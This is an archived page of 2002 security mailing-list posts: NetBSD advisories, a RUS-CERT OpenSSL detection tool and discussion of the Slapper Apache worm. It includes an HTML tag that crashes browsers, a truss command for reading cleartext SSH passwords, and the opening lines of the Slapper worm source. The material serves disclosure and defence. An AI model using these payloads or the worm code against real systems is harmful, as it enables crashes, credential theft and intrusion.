Re: Bypassing SMTP Content Protection with a Flick of a Button

2002-09-17 Thread Steven M. Bellovin

It turns out that this isn't new.  I forwarded the note to Ned Freed, 
one of the authors of RFC 2046.  He showed it to Kristin Hubner, who 
found the following text from the manual on using PMDF in a firewall
that she had written in 1996:

   Note that when you are using the conversion channel to check message parts
   on the PMDF firewall system, you are likely to want the defragment channel
   keyword on outgoing channels, particularly channels that send to internal
   systems. The MIME format allows for messages to be split into multiple
   pieces, which are normally not reassembled until arrival at the final
   destination system. However, if you want the intermediate PMDF firewall
   system to check the message content, you will want to reassemble the message
   parts on the PMDF firewall system, so that the message content (rather than
   message content fragments) can be checked.

--Steve Bellovin, (me) (Firewalls book)

Bug in Opera and Konqueror

2002-09-17 Thread Zeux

Read the attached advisory.

WBR, Zeux.
Origin: I say evolve, let the chips fall where they may.
--- Zeux[EMAIL PROTECTED] from sp00fed packet

| sp00fed packet |  | advisory #2 |
| Product: multiply vendors browsers  |
| Vulnerability: buffer overflow  |
| Danger: low |
 Sample HTML-code to crash browsers:
img src=blank.gif width=32759 height=132750
 blank.gif must be a working image. Its size can be about 2 kb.
 Why width is 32759? It's the highest value Opera 6.01 allows for width.
Height can be very big (maybe there are limits for height in Opera, but
I don't have such information).
 The target is to generate buffer overflow by asking browser to display
scaled image with very big scale. Opera crashes in 1-2 seconds (and
displays error message in the console: /usr/bin/opera: line 72: 17445
Segmentation fault  $OPERA $@), Konqueror first loads system very
much, then produces SIGSEGV. The tested versions are showed below. The
version of Opera was recent at the time of finding the bug, so (I think)
the version is present in all earlier versions. My version of Konqueror
is out of date, and I do not have the recent release of it, so I will be
glad if somebody tests this vulnerability and reports me the results.
 In reality (as I think), the bug in Opera is present because of the bug
in QImage (image engine), used in Opera to display images.

[vulnerable] Opera v6.01 build 175 for Linux
[vulnerable] Konqueror v2.1.1

Opera, Inc was informed 7 days ago. Answer was not received
KDE Development Group was informed 7 days ago. Answer:

From [EMAIL PROTECTED] Sun Sep  8 00:33:00 2002
From [EMAIL PROTECTED] Sun Sep 08 00:33:02 2002
Envelope-to: [EMAIL PROTECTED]
Delivery-date: Sun, 08 Sep 2002 00:33:02 +0400
Received: from drweb by with drweb-scanned (Exim MX.5)
id 17nmGM-DA-00
for [EMAIL PROTECTED]; Sun, 08 Sep 2002 00:33:02 +0400
Received: from [] (
by with smtp (Exim MX.5)
id 17nmGL-CP-00
for [EMAIL PROTECTED]; Sun, 08 Sep 2002 00:33:01 +0400
Received: (qmail 22134 invoked by uid 1003); 7 Sep 2002 20:33:00 -
Date: 7 Sep 2002 20:33:00 -
From: [EMAIL PROTECTED] (Stephan Kulow)
Subject: Bug#47456 acknowledged by developer
 (Konqueror bug)
Status: RO
X-Status: O

Your report has been marked as closed by one of the developers, namely
Stephan Binner [EMAIL PROTECTED].

The report is about a very old version of the software. Many improvements
have been made and many bugs have been fixed in the meanwhile. Given the huge
number of bug reports we receive, we are no longer investigating bug reports
for this version of the software. Please upgrade to the latest official
release. If you find your problem still persisting, then we were unable to reproduce 
it and you might need to provide more details on your setup that may make the 
diffrence. Thanks in advance.

If you are pretty sure that something went wrong, 
please contact Stephan Binner [EMAIL PROTECTED] directly.

Stephan Kulow
(administrator, KDE bugs database)

The creators of the packet did not even check the presence of this vulnerability
on the new browser, so I ask you to check it on the Konqueror from KDE3.

 [] sp00fed packet
 [[EMAIL PROTECTED]] Zeux (it's me ;)
 [[EMAIL PROTECTED]] Spikir (team coordinator)

OpenSSH 3.4p1 Privsep

2002-09-17 Thread Andrew Danforth

During authentication, OpenSSH 3.4p1 with privsep enabled passes the
cleartext password from the main process to the privsep child using a
pipe.  Using strace or truss, root can see the user's plaintext password
flying by.  I observed this behavior from OpenSSH 3.4p1 built using GCC on
Solaris 2.8 and the current Debian OpenSSH 3.4p1 package.

Theo and Markus tell me that this is not an issue.  Theo says that you
cannot prevent root from determining a user's password.  I don't disagree,
but asked why OpenBSD bothers to encrypt user passwords at all if that is
his attitude.

The level of effort to determine cleartext passwords, for even the most
inexperienced Unix administrator, is almost zero given the above.  I
realize that no matter how you slice it, it will be possible for root to
grab the password from wherever it's stored in memory.  Or recompile sshd
to log the password, or any number of other ways.  However, the methods I
just mentioned all require someone with significantly more know how than:

truss -fp `cat /var/run/`

I'm not saying this is a bug, rather I thought it worthwhile to share with
the community and let you all come to your own conclusions.


RE: bugtraq.c httpd apache ssl attack

2002-09-17 Thread Sandu Mihai Eduard

The worm is an AGENT, because it accepts commands throughout the global P2P
network created ad-hoc between its instances. One of such commands is
'execute local command on target' (see source, command code: 0x24) and this
thing can be used to terminate the worm instantly, by injecting the command
'killall .bugtraq' in the P2P network. The worm's instances will self
destruct in this way. I am puzzled that anyone did not thought of that...

All my best,
Sandu Mihai - KPNQwest Romania Network Engineer

-Original Message-
Sent: 13 September 2002 21:51
Subject: Re: bugtraq.c httpd apache ssl attack

Wouldn't it be easier to create a blank /tmp/.bugtraq.c file, chmod 000,
owned by root?

On Fri, 13 Sep 2002, The Little Prince wrote:

 too easy to chmod 700 gcc to lock it to root?
 obviously not as a TOTAL fix


 Anthony J. BiaccoNetwork

  Every day should be a good day to die   -DJM


 On 13 Sep 2002, Fernando Nunes wrote:

  I am using RedHat 7.3 with Apache 1.3.23. Someone used the
  program bugtraq.c to explore an modSSL buffer overflow to get access
  a shell. The attack creates a file named /tmp/.bugtraq.c and compiles
  using gcc. The program is started with another computer ip address as
  argument. All computer files that the user apache can read are
  The program attacks the following Linux distributions:
  Red-Hat: Apache 1.3.6,1.3.9,1.3.12,1.3.19,1.3.20,1.3.22,1.3.23,1.3.26
  SuSe: Apache 1.3.12,1.3.17,1.3.19,1.3.20,1.3.23
  Mandrake: 1.3.14,1.3.19
  Slakware: Apache 1.3.26
  Fernando Nunes


 Anthony J. BiaccoNetwork

  Every day should be a good day to die   -DJM


Re: Linux Slapper Worm code

2002-09-17 Thread KF

John Scimone wrote:

Haven't seen this posted yet so figured some people might be interested, even 
though thousands of computers have already had the exploit delivered to their 
doorstep. heh the kiddies are gonna love this one.
Full-Disclosure - We believe in it.


I think John forgot the attachment. This code was found in the wild so 
if you don't like me posting this get over it. Its not like it wouldn't 
eventually find its way into /tmp on a few of your boxes.

 *  *
 *   Peer-to-peer UDP Distributed Denial of Service (PUD)   *
 * by contem@efnet  *
 *  *
 * Virtually connects computers via the udp protocol on the *
 *  specified port.  Uses a newly created peer-to-peer protocol that*
 *  incorperates uses on unstable or dead computers.  The program is*
 *  ran with the parameters of another ip on the virtual network.  If   *
 *  running on the first computer, run with the ip or some*
 *  other type of local address.  Ex:   *
 *  *
 *   Computer A:   ./program  *
 *   Computer B:   ./program Computer_A *
 *   Computer C:   ./program Computer_A *
 *   Computer D:   ./program Computer_C *
 *  *
 * Any form of that will work.  The linking process works by*
 *  giving each computer the list of avaliable computers, then  *
 *  using a technique called broadcast segmentation combined with TCP   *
 *  like functionality to insure that another computer on the network   *
 *  receives the broadcast packet, segments it again and recreates  *
 *  the packet to send to other hosts.  That technique can be used to   *
 *  support over 16 million simutaniously connected computers.  *
 *  *
 * Thanks to ensane and st for donating shells and test beds*
 *  for this program.  And for the admins who removed me because I  *
 *  was testing this program (you know who you are) need to watch   *
 *  their backs.*
 *  *
 * I am not responsible for any harm caused by this program!*
 *  I made this program to demonstrate peer-to-peer communication and   *
 *  should not be used in real life.  It is an education program that   *
 *  should never even be ran at all, nor used in any way, shape or  *
 *  form.  It is not the authors fault if it was used for any purposes  *
 *  other than educational. *
 *  *

#include stdio.h
#include unistd.h
#include string.h
#include fcntl.h
#include stdlib.h
#include stdarg.h
#include sys/ioctl.h
#include sys/types.h
#include sys/socket.h
#include netinet/in.h
#include sys/time.h
#include unistd.h
#include errno.h
#include netdb.h
#include arpa/telnet.h
#include sys/wait.h
#include signal.h

#define SCAN
#undef LARGE_NET
#undef FREEBSD

#define BROADCASTS  2
#define LINKS   128
#define CLIENTS 128
#define PORT2002
#define SCANPORT80
#define MAXPATH 4096
#define ESCANPORT   10100
#define VERSION 12092002

//  Macros  //

#define FREE(x) {if (x) { free(x);x=NULL; }}

enum { AREAD=1, AWRITE=2, AEXCEPT=4 };

//  Packet headers  //

struct llheader {
char type;

NetBSD Security Advisory 2002-012: buffer overrun in setlocale

2002-09-17 Thread NetBSD Security Officer


 NetBSD Security Advisory 2002-012

Topic:  buffer overrun in setlocale

Severity:   local root exploit if X11 (xterm) is installed.

Version:NetBSD-current: source prior to August 8, 2002
NetBSD-1.6 beta:source prior to August 8, 2002
NetBSD-1.5.3:   affected
NetBSD-1.5.2:   affected
NetBSD-1.5.1:   affected
NetBSD-1.5: affected
NetBSD-1.4.*:   affected
All prior NetBSD releases.

Fixed:  NetBSD-current: August 8, 2002
NetBSD-1.6 branch:  August 8, 2002 (1.6 includes the fix)
NetBSD-1.5 branch:  September 5, 2002
NetBSD-1.4 branch:  not yet


There was a boundary checking bug of array suffix in setlocale()
function in libc.  If the setlocale() function is used with arguments
satisfying a specific condition (see below), there is a possibility
that this could be exploitable.  This condition is as the following:

1. setlocale() function is called for LC_ALL category and
2. The string pointed to by the second argument of setlocale contains
   over six elements separated by slash.  An example of string causing
   this problem to setlocale() is C/C/C/C/C/C/C.  (note that the
   frequently used special form, setlocale(LC_ALL, ), does not cause
   this problem, since the code having this problem is never executed
   in this case.)
3. To use this bug to exploit, the second argument of setlocale needs
   to be derived from user-given data (e.g. environment variables or
   command line arguments) and the program need to be setuid or
   need to be involved in some setuid program or daemon.

Most programs using Xt, including xterm (setuid program), may satisfy
this condition.  All other programs in NetBSD distribution except for
packages do not satisfy it.  In packages, zsh is one of the most
important program that may satisfy this condition.

Technical Details

The setlocale (or its subcontractor, __setlocale) function, defined in
lib/libc/locale/setlocale.c, is used to change the locale of each
locale category.  setlocale() function switches the locale of the
category specified by the first argument to the second argument.  The
special category LC_ALL can be used to change all locale categories at
the same time.  In this case, the NetBSD implementation of setlocale
allows a special form of the second argument string to specify
individual locales per category.

In this form, each locale is given in a single string separated by
slashes ('/'), as A/B/C/D/E/F.  Here, each element corresponds to
LC_MESSAGES, respectively.  The setlocale() function attempts to
decomposit these elements into an array object named new_categories
locally defined in lib/libc/locale/setlocale.c.  However, the code to
check the array boundary was lacking and thus this decomposition code
could destroy data segment if a string having over six elements was

If the program which has set[ug]id bit or which is called from
set[ug]id program calls setlocale() with LC_ALL as the first argument
and with the string derived from user-given data
(e.g. setlocale(LC_ALL, getenv(FOO)) ) as the second argument, then
such program could be exploitable.  DefaultLanguageProc function of X
Toolkit Intrinsics (Xt) is a example of such usage. DefaultLanguageProc 
calls setlocale as setlocale(LC_ALL, xnl).  Here, xnl variable is
null string () by default, but can be overriden by user via
- -xnllanguage option.  Most Xt programs, including xterm, use this
language procedure.  xterm is a setuid root program and thus any local
user could illegally acquire root account by using this problem.

On the other hand, the frequently used special form,
setlocale(LC_ALL, ), does not have this problem because the decomposition
code is never executed in this form, although user-given LC_ALL environment
variable is similarly referred.

Solutions and Workarounds

The recent NetBSD 1.6 release is not vulnerable to this issue. A full
upgrade to NetBSD 1.6 is the recommended resolution for all users able
to do so. Many security-related improvements have been made, and
indeed this release has been delayed several times in order to include
fixes for a number of recent issues.

Otherwise, you must update libc.  Also, you must update all statically
linked binaries satisfying the condition above - although the NetBSD
distribution contains no such static binaries, you may have some from
pkgsrc packages or local programs.  The following instructions
describe how to update libc.

* NetBSD-current:

Systems running NetBSD-current dated from before 2002-08-08
should be upgraded to NetBSD-current dated 2002-08-08 or later.

Remote detection of vulnerable OpenSSL versions

2002-09-17 Thread Florian Weimer

Remote detection of vulnerable OpenSSL versions

   RUS-CERT has developed a tool to remotely detect vulnerable OpenSSL

Why is such a tool required?

   While the Slapper worm is spreading, many system administrators ask
   themselves whether their systems are vulnerable. Even if you apply
   vendor patches regularly, there are some risks which are hard to deal

 * Vendors might use OpenSSL to implement SSL services, but do not
   publicize it. Consequently, administrators might not know that
   they need to update.
 * Human error might leave systems vulnerable (e.g. people forget to
   restart services after applying patches, or are distracted by
   phone calls and miss a machine).
 * Other SSL implementations might have similar bugs.
 * Vendor upgrades often do not alter the version number, and their
   is no easy way to check if a patched version is running.
 * Vendor patches sometimes do not eliminate the vulnerability.

   As a result, full disclosure is essential; it makes independent
   regression testing possible.

How does it work?

   It is difficult to tell OpenSSL 0.9.6e from vulnerable versions
   because the OpenSSL developers chose to terminate the process if a
   buffer overflow attempt is detected. Over the network, a crash due to
   a buffer overflow and an abrupt, but deliberate process termination
   look the same: in both cases, the TCP connection breaks down. At first
   glance, it appears that we are out of luck and cannot detect
   vulnerable versions.

   However, if we overrun the buffer by only a few bytes, the vulnerable
   version (without check) does not crash. This way, we can tell 0.9.6e
   from previous, vulnerable versions:

 small overflow large overflow
  pre-0.9.6eno crashcrash
  0.9.6e crash  crash
  0.9.6g error  error

   (0.9.6g signals an SSL error over the network, as one would expect.)

   Other combinations are possible, of course, and this program tries to
   flag them in a reasonable way. (We consider malformed responses an
   indication of lack of care, and a potential security problem.)

   This program performs a third connection attempt (actually the first
   one), to test compatibility of the the SSL implementations.

Obtaining and running the tool

   You can download a copy of the C source code here:


   Compiling this program requires an OpenSSL development environment
   (including header files). You have to link this program with OpenSSL's
   crypto library (using -lcrypto, not -lcrypt). On some systems,
   you have to link with -ldl, too.

   After compilation, you can run this program using:

$ ./openssl-sslv2-master [-s] host-IP [port]

   Then a test is performed against host-IP (an IP address in dotted-quad
   notation) and the TCP service running on port (a decimal number). port
   can be omitted, then the default port 443 is assumed.

   Note: You can use this program to test any SSL Version 2.0 server, not
   just HTTPS servers. For some services, a STARTTLS message is required
   to initiate the SSL handshake (e.g. SMTP, POP3, IMAP). This message is
   sent if you supply the -s option.

Risks and limitations

   The server could crash (when the large buffer overflow is attempted),
   and fail to restart automatically. The program detects this, but
   obviously cannot undo any damage.

   If the server which is being tested does not support SSLv2, it often
   reacts in a strange way. The SSL protocol does not define a clear
   rejection message, so no proper diagnosis is return by the tool in
   such cases. To determine the cause of a handshake failure, you should
   use a full SSL/TLS implementation, such as openssl s_client.


   This program was inspired by the source code of the Slapper worm.

   Thanks to Helmut Springer for testing and spotting a few bugs.


   RUS-CERT http://CERT.Uni-Stuttgart.DE/ is the Computer Emergency
   Response Team located at the Computing Center (RUS) of the
   University of Stuttgart, Germany.

URL of the current version of this document:

University of Stuttgart   http://CERT.Uni-Stuttgart.DE/people/fw/
RUS-CERT  fax +49-711-685-5898

NetBSD Security Advisory 2002-017: shutdown(s, SHUT_RD) on TCP socket does not work as intended

2002-09-17 Thread NetBSD Security Officer


 NetBSD Security Advisory 2002-017

Topic:  shutdown(s, SHUT_RD) on TCP socket does not work as intended

Version:NetBSD-current:  source prior to September 7, 2002
NetBSD 1.6 beta: affected
NetBSD-1.5:  affected

Severity:   Unexpected kernel memory consumption

Fixed:  NetBSD-current: September 7, 2002
NetBSD-1.6 branch:  September 7, 2002 (1.6 includes the fix)
NetBSD-1.5 branch:  September 7, 2002
NetBSD-1.4 branch:  not yet


shutdown(s, SHUT_RD) is used to indicate that there should be no inbound
traffic expected on the socket.  There was mistake in TCP with respect to
the handling of shutdown'ed socket, leading to unexpected kernel resource
consumption and unexpected behavior.

Technical Details

Some of sbappend() calls from sys/netinet/tcp_input.c did not consult
SS_CANTRCVMORE flag on socket properly.

Solutions and Workarounds

The recent NetBSD 1.6 release is not vulnerable to this issue. A full
upgrade to NetBSD 1.6 is the recommended resolution for all users able
to do so. Many security-related improvements have been made, and
indeed this release has been delayed several times in order to include
fixes for a number of recent issues.

The following instructions describe how to upgrade your kernel by
updating your source tree and rebuilding and installing a new version
of kernel.

* NetBSD-current:

Systems running NetBSD-current dated from before 2002-09-06
should be upgraded to NetBSD-current dated 2002-09-06 or later.

The following directories need to be updated from the
netbsd-current CVS branch (aka HEAD):

To update from CVS, re-build, re-install kernel and reboot:
# cd src
# cvs update -d -P sys/netinet

Configure, compile, install and boot a new kernel according to
the instructions at: 

* NetBSD 1.6 beta:

Systems running NetBSD 1.6 BETAs and Release Candidates should
be upgraded to the NetBSD 1.6 release.

If a source-based point upgrade is required, sources from the
NetBSD 1.6 branch dated 2002-09-06 or later should be used.

The following directories need to be updated from the
netbsd-1-6 CVS branch:

To update from CVS, re-build, re-install kernel and reboot:
# cd src
# cvs update -d -P -r netbsd-1-6 sys/netinet

Configure, compile, install and boot a new kernel according to
the instructions at: 

* NetBSD 1.5, 1.5.1, 1.5.2, 1.5.3:

Systems running NetBSD 1.5, 1.5.1, 1.5.2, or 1.5.3 sources dated
from before 2002-09-06 should be upgraded from NetBSD 1.5.*
sources dated 2002-09-06 or later.

NetBSD 1.5.4 will be shipped with fixes.

The following directories need to be updated from the
netbsd-1-5 CVS branch:

To update from CVS, re-build, re-install kernel and reboot:
# cd src
# cvs update -d -P -r netbsd-1-5 sys/netinet

Configure, compile, install and boot a new kernel according to
the instructions at: 

* NetBSD 1.4, 1.4.1, 1.4.2, 1.4.3:

The advisory will be updated to include instructions to remedy
this problem for systems running the NetBSD-1.4 branch.

Thanks To

Sean Boudreau

The NetBSD Release Engineering teams, for great patience and
assistance in dealing with repeated security issues discovered

Revision History

2002-09-16  Initial release

More Information

Advisories may be updated as new information comes to hand.  The most
recent version of this advisory (PGP signed) can be found at

Information about NetBSD and NetBSD security can be found at
http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/.

Copyright 2002, The NetBSD Foundation, Inc.  All Rights Reserved.

$NetBSD: NetBSD-SA2002-017.txt,v 1.9 2002/09/16 05:17:55 dan Exp $

Version: 2.6.3ia
Charset: noconv


NetBSD Security Advisory 2002-014: fd_set overrun in mbone tools and pppd

2002-09-17 Thread NetBSD Security Officer


 NetBSD Security Advisory 2002-014

Topic:  fd_set overrun in mbone tools and pppd

Version:NetBSD-current: source prior to August 10, 2002
NetBSD 1.6 beta: sources prior to August 11, 2002
NetBSD-1.5.3:   affected
NetBSD-1.5.2:   affected
NetBSD-1.5.1:   affected
NetBSD-1.5: affected
NetBSD-1.4.*:   affected

Severity:   possible local root compromise

Fixed:  NetBSD-current: August 10, 2002
NetBSD-1.6 branch:  August 11, 2002 (1.6 includes the fix)
NetBSD-1.5 branch:  September 5, 2002
NetBSD-1.4 branch:  not yet


The IPv4 multicast-related tools mrinfo(1) and mtrace(1), and the PPP
daemon pppd(8), are setuid root binaries.  A malicious local user can
cause a buffer overrun in these programs by filling file descriptor
tables before exec'ing them, which could lead to local root

No exploit code is known to exist at this moment.

Technical Details

These tools use select(2).  select(2) uses fd_set bitmap, which
supports up to FD_SETSIZE (256) file descriptors.  These tools did not
have a boundary check when doing FD_SET() operations.  Therefore, if
the file descriptor used for select(2) equals to or exceeds
FD_SETSIZE, a buffer overrun occurs.

More details are in the NetBSD-current select(2) manpage BUGS section:

   Although the provision of getdtablesize(3) was intended to allow user
   programs to be written independent of the kernel limit on the number of
   open files, the dimension of a sufficiently large bit field for select
   remains a problem.  The default bit size of fd_set is based on the symbol
   FD_SETSIZE (currently 256), but that is somewhat smaller than the current
   kernel limit to the number of open files.  However, in order to accommo-
   date programs which might potentially use a larger number of open files
   with select, it is possible to increase this size within a program by
   providing a larger definition of FD_SETSIZE before the inclusion of
   sys/types.h.  The kernel will cope, and the userland libraries provided
   with the system are also ready for large numbers of file descriptors.

Solutions and Workarounds

If you do not run, and do not plan to use, multicast-related tools or
pppd, the problem can be worked around by removing the setuid bit from
those binaries.  Users can therefore no longer escalate their
privileges by exploiting the bug:

# chmod u-s /usr/sbin/mrinfo /usr/sbin/mtrace /usr/sbin/pppd

Nevertheless, we suggest upgrading these binaries to make sure you
don't have vulnerable code in your system.

The recent NetBSD 1.6 release is not vulnerable to this issue. A full
upgrade to NetBSD 1.6 is the recommended resolution for all users able
to do so. Many security-related improvements have been made, and
indeed this release has been delayed several times in order to include
fixes for a number of recent issues.

Otherwise, the following instructions describe how to upgrade your
binaries by updating your source tree and rebuilding and installing a
new version.

* NetBSD-current:

Systems running NetBSD-current dated from before 2002-08-10
should be upgraded to NetBSD-current dated 2002-08-10 or later.

The following directories need to be updated from the
netbsd-current CVS branch (aka HEAD):

To update from CVS, re-build, and re-install mrinfo and mtrace:
# cd src
# cvs update -dP usr.sbin/mrinfo usr.sbin/mtrace usr.sbin/pppd

# cd usr.sbin/mrinfo
# make cleandir dependall
# make install

# cd usr.sbin/mtrace
# make cleandir dependall
# make install

# cd usr.sbin/pppd
# make cleandir dependall
# make install

* NetBSD 1.6 beta:

Systems running NetBSD 1.6 BETAs and Release Candidates should
be upgraded to the NetBSD 1.6 release.

If a source-based point upgrade is required, sources from the
NetBSD 1.6 branch dated 2002-08-11 or later should be used.

The following directories need to be updated from the
netbsd-1-6 CVS branch:

To update from CVS, re-build, and re-install mrinfo and mtrace:
# cd src
# cvs update -d -P -r netbsd-1-6 \
usr.sbin/mrinfo usr.sbin/mtrace usr.sbin/pppd

# cd usr.sbin/mrinfo
# make cleandir dependall

Multiple NetBSD Security Advisories Released/Updated

2002-09-17 Thread NetBSD Security Officer


With the release of NetBSD 1.6, the NetBSD project is publishing a
batch of Security Advisories (some of which are updates), as follows:

*   2002-006buffer overrun in libc/libresolv DNS resolver
 x  2002-007Repeated TIOCSCTTY ioctl can corrupt session hold counts
*x  2002-009Multiple vulnerabilities in OpenSSL code
*x  2002-010symlink race in pppd
*x  2002-011Sun RPC XDR decoder contains buffer overflow
 x  2002-012buffer overrun in setlocale
 x  2002-013Bug in NFS server code allows remote denial of service
 x  2002-014fd_set overrun in mbone tools and pppd
 x  2002-017shutdown(s, SHUT_RD) on TCP socket does not work as intended
 x+ 2002-018Multiple security isses with kfd daemon

(*) reissue   (x) affects 1.5.3   (+) affects 1.6

These advisories involve bugs in libc (affecting static binaries), as
well as the kernel.  A full system rebuild is recommended to
collectively address all of these issues, but please make sure to read
through all of the advisories in case specific issues affect your

Because of the extensive rebuild required, the NetBSD 1.6 release was
delayed in order to include fixes for as many of these issues as
possible, so as to provide binary release users with an easy upgrade

Readers will note that there are some gaps in the above numbering.
These pending advisories involve third parties, and are awaiting
disclosure co-ordination, so we cannot publish them at this time.
However, they *are* fixed in NetBSD 1.6.

Unfortunately, the recent 1.5.3 release was affected by most of these
issues. Unlike NetBSD 1.6, the 1.5 branch cannot be automatically
cross-built to release, and so any updated binary release from the 1.5
tree will take considerable time and developer effort.


 * The recommended cumulative fix for pre-1.6 systems is to upgrade to
   NetBSD 1.6. 

 * Users who cannot upgrade to 1.6 are recommended to update to the
   most recent sources on the NetBSD-1.5 branch, via anoncvs, and
   rebuild from there.

 * Users of NetBSD-current should upgrade to source more recent than
   September 11, 2002, and rebuild the kernel and all userland.

Having updated the base NetBSD distribution via one of the above, the
following steps are necessary for *all* users:

 * Recompile statically-linked binaries from pkgsrc, or custom builds (for
 * Remove any shared libraries with older major numbers. (2002-006)
 * Remove any shared libraries for OS emulation under /emul, unless you 
   are sure it has no security vulnerabilities. (2002-006)
 * Follow instructions in 2002-018

Version: 2.6.3ia
Charset: noconv


NetBSD Security Advisory 2002-010: symlink race in pppd

2002-09-17 Thread NetBSD Security Officer


 NetBSD Security Advisory 2002-010

Topic:  symlink race in pppd

Version:NetBSD-current:  source prior to July 31, 2002
NetBSD-1.6 beta: affected
NetBSD-1.5:  affected

Severity:   Local user may be able to modify permissions on any file

Fixed:  NetBSD-current: July 31, 2002
NetBSD-1.6 branch:  August 3, 2002
(NetBSD 1.6 includes the fix)
NetBSD-1.5 branch:  September 5, 2002
NetBSD-1.4 branch:  not yet


A race condition exists in the pppd program that may be exploited
in order to change the permissions of an arbitrary file.

A malicious local user may exploit the race condition to acquire write
permissions to a critical system file, and leverage the situation to
acquire escalated privileges.

Technical Details

The file specified as the tty device is opened by pppd, and the
permissions are recorded.  If pppd fails to initialize the tty
device in some way (such as a failure of tcgetattr(3)), then pppd
will attempt to restore the original permissions by calling chmod(2).
The call to chmod(2) is subject to a symlink race, so that the
permissions may be `restored' on some other file.

Solutions and Workarounds

The recent NetBSD 1.6 release is not vulnerable to this issue. A full
upgrade to NetBSD 1.6 is the recommended resolution for all users able
to do so. Many security-related improvements have been made, and
indeed this release has been delayed several times in order to include
fixes for a number of recent issues.

Otherwise, the following instructions describe how to upgrade your
pppd binaries by updating your source tree and rebuilding and
installing a new version of pppd.

* NetBSD-current:

Systems running NetBSD-current dated from before 2002-07-30
should be upgraded to NetBSD-current dated 2002-07-31 or later.

The following directories need to be updated from the
netbsd-current CVS branch (aka HEAD):

To update from CVS, re-build, and re-install pppd:
# cd src
# cvs update -d -P usr.sbin/pppd

# cd usr.sbin/pppd
# make cleandir dependall
# make install

* NetBSD 1.6 beta:

Systems running NetBSD 1.6 BETAs and Release Candidates should
be upgraded to the NetBSD 1.6 release.

If a source-based point upgrade is required, sources from the
NetBSD 1.6 branch dated 2002-08-04 or later should be used.

The following directories need to be updated from the
netbsd-1-6 CVS branch:

To update from CVS, re-build, and re-install pppd:
# cd src
# cvs update -d -P -r netbsd-1-6 usr.sbin/pppd

# cd usr.sbin/pppd
# make cleandir dependall
# make install

* NetBSD 1.5, 1.5.1, 1.5.2, 1.5.3:

Systems running NetBSD 1.5 dated from before 2002-09-05 should
be upgraded to NetBSD 1.5 branch dated 2002-09-05 or later.

The following directories need to be updated from the
netbsd-1-5 CVS branch:

To update from CVS, re-build, and re-install pppd:
# cd src
# cvs update -d -P -r netbsd-1-5 usr.sbin/pppd

# cd usr.sbin/pppd
# make cleandir dependall
# make install

* NetBSD 1.4, 1.4.1, 1.4.2, 1.4.3:

The advisory will be updated to include instructions to remedy
this problem for systems running the NetBSD-1.4 branch.

Thanks To

Jun-ichiro itojun Hagino for patches, and preparing the advisory text.

The NetBSD Release Engineering teams, for great patience and
assistance in dealing with repeated security issues discovered

Revision History

2002-08-01  Initial release
2002-09-05  1.5 fixed
2002-09-16  Re-release with updated information

More Information

An up-to-date PGP signed copy of this release will be maintained at

Information about NetBSD and NetBSD security can be found at
http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/.

Copyright 2002, The NetBSD Foundation, Inc.  All Rights Reserved.

$NetBSD: NetBSD-SA2002-010.txt,v 1.15 2002/09/16 05:17:55 dan Exp $

Version: 2.6.3ia
Charset: noconv

Re: bugtraq.c httpd apache ssl attack

2002-09-17 Thread Ben Laurie

Fernando Nunes wrote:
 I am using RedHat 7.3 with Apache 1.3.23. Someone used the 
 program bugtraq.c to explore an modSSL buffer overflow to get access to 
 a shell. The attack creates a file named /tmp/.bugtraq.c and compiles it 
 using gcc. The program is started with another computer ip address as 
 argument. All computer files that the user apache can read are exposed.
 The program attacks the following Linux distributions:
 Red-Hat: Apache 1.3.6,1.3.9,1.3.12,1.3.19,1.3.20,1.3.22,1.3.23,1.3.26
 SuSe: Apache 1.3.12,1.3.17,1.3.19,1.3.20,1.3.23
 Mandrake: 1.3.14,1.3.19
 Slakware: Apache 1.3.26

Note that if you are using Apache 1.3.23 you are probably also 
vulnerable to the chunked overflow bug.

If people would stay up to date with security patches, this stuff 
wouldn't happen.




There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit. - Robert Woodruff

Re: Password Security Policy Question

2002-09-17 Thread Nate Lawson

At 11:36 AM 9/10/2002 -0500, L. Adrian Griffis wrote:
  I am aware of a company that has instituted a policy that limits a
  specific character in people's passwords to being a numeric character.
  Personally, I am confused at this policy.  It seems to me that
  placing such a specific limit on a specific position in a password
  simply reduces the number of guesses that someone would have to try
  in a brute force attack.
  Does anyone out there know if there is any theoretical basis for
  believing that a policy to limit a specific character position
  in passwords to a numeric character will enhance security.  If not,
  does anyone know how such a misunderstanding might have occurred?

This is a bad idea.  Ross Anderson's group did a good study on different
password selection approaches:


NetBSD Security Advisory 2002-007: Repeated TIOCSCTTY ioctl can corrupt session hold counts

2002-09-17 Thread NetBSD Security Officer


 NetBSD Security Advisory 2002-007

Topic:  Repeated TIOCSCTTY ioctl can corrupt session hold counts

Version:NetBSD-current: source prior to July 21, 2002 
NetBSD-1.6 beta: source prior to July 23, 2002
NetBSD-1.5.*:   source prior to September 5, 2002
NetBSD-1.5.3:   affected
NetBSD-1.5.2:   affected
NetBSD-1.5.1:   affected
NetBSD-1.5: affected
NetBSD-1.4.*:   affected

Severity:   Local user can cause system panic

Fixed:  NetBSD-current: July 21, 2002
NetBSD-1.6 branch:  July 23, 2002 (1.6 includes the fix)
NetBSD-1.5 branch:  September 5, 2002
NetBSD-1.4 branch:  not yet


A Session leader can use the TIOCSCTTY ioctl to set the session
controlling terminal. This ioctl can be called any number of times.
The call unconditionally raised the hold count of a kernel structure
shared between processes in the same session. It was possible to
overflow the structure counter, and thus arrange for the structure
memory to be freed prematurely, and possibly re-used.  This could
cause a kernel panic or incorrect operation the next time the session
structure is accessed from the context of other processes which are
part of the former session.

Technical Details

A process can start a new session (and thus create a new session
leader), by forking a child and exiting. The new child can then call
setsid(2) to create a new session, and thus become a session
leader. The child process can then call the TIOCSCTTY ioctl.

Structures shared between multiple processes (such as the session
structure) normally contain counters to keep track of how many times a
structure is referenced. Typically, macros are used to increase/decrease
the use counter, and the structure is freed when the counter goes to

By repeatedly invoking TIOCSCTTY, it's possible to overflow the integer
counter such that when a process exits (and thus the session structure
counter is decreased), the counter hits zero and structure is freed even
though other processes still reference it. Depending on kernel options,
this might immediately cause the memory to be overwritten with junk
data, or the memory will be overwritten by random other data when the
memory is allocated to something else. In either case, if any of the
processes of the old session group access the memory, they would very
likely follow trashed pointers and cause a kernel panic.

Solutions and Workarounds

NetBSD official releases up to and including 1.5.3 are vulnerable.

The recent NetBSD 1.6 release is not vulnerable to this issue. A full
upgrade to NetBSD 1.6 is the recommended resolution for all users able
to do so. Many security-related improvements have been made, and
indeed this release has been delayed several times in order to include
fixes for a number of recent issues.

